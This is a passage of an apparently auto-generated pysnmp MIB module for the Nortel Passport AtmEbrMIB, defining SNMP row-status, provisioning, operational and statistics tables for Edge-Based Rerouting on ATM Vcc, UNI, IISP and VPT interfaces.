mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')

# Operational table (branch 30): read-only yes/no state flags.
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')

# Statistics table (branch 40): read-only Counter32 totals.
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfUniEbr subtree: per-UNI EBR configuration and counters ---
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))

# Row-status table, indexed by AtmIf / Uni / UniEbr indices.
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfUniEbrIndex.setStatus('mandatory')

# Provisioning table: here the writable columns are one-octet fixed-length
# OCTET STRINGs defaulting to hex c0 (a bit-field encoding, unlike the
# yes/no Integer32 flags used in the ...SrcEbrOv prov tables).
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')

# Operational table (branch 30): read-only Gauge32 connection counts.
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')

# Statistics table (branch 40): read-only Counter32 totals.
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfIispEbr subtree: per-IISP EBR configuration and counters ---
# Same table layout as mscAtmIfUniEbr, rooted under the Iisp branch
# (114, 7, 7) and indexed via the AtmIispMIB interface index.
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))

# Row-status table, indexed by AtmIf / Iisp / IispEbr indices.
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')

# Provisioning table: one-octet fixed-length bit-field columns, default
# hex c0, read-write (same encoding as the UniEbr prov columns).
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')

# Operational table (branch 30): read-only Gauge32 connection counts.
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptIispEbr: Ebr component under AtmIf/Vpt/Iisp. Same generated
# layout as the other Ebr components: RowStatus (.1), Prov (.20), Oper (.30),
# Stats (.40) tables; entries add the mscAtmIfVptIndex to the index chain.
# ---------------------------------------------------------------------------
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))
# Row-status table.
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatus.setStatus('mandatory')
mscAtmIfVptIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrComponentName.setStatus('mandatory')
mscAtmIfVptIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStorageType.setStatus('mandatory')
mscAtmIfVptIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIndex.setStatus('mandatory')
# Provisioning table: 1-octet flag fields, default 0xc0.
mscAtmIfVptIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvTable.setStatus('mandatory')
mscAtmIfVptIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrProvEntry.setStatus('mandatory')
mscAtmIfVptIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfVptIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only gauges.
mscAtmIfVptIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperTable.setStatus('mandatory')
mscAtmIfVptIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrOperEntry.setStatus('mandatory')
mscAtmIfVptIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfVptIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfVptIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only counters.
mscAtmIfVptIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsTable.setStatus('mandatory')
mscAtmIfVptIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfVptIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfVptIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptIispEbrTotalPathOptimizations.setStatus('mandatory')
# ---------------------------------------------------------------------------
# mscAtmIfVptPnniEbr: Ebr component under AtmIf/Vpt/Pnni. Same four-table
# layout (RowStatus .1, Prov .20, Oper .30, Stats .40), indexed by
# AtmIf / Vpt / VptPnni / VptPnniEbr.
# ---------------------------------------------------------------------------
mscAtmIfVptPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7))
# Row-status table.
mscAtmIfVptPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfVptPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfVptPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrComponentName.setStatus('mandatory')
mscAtmIfVptPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrStorageType.setStatus('mandatory')
mscAtmIfVptPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrIndex.setStatus('mandatory')
# Provisioning table: 1-octet flag fields, default 0xc0.
mscAtmIfVptPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfVptPnniEbrProvTable.setStatus('mandatory')
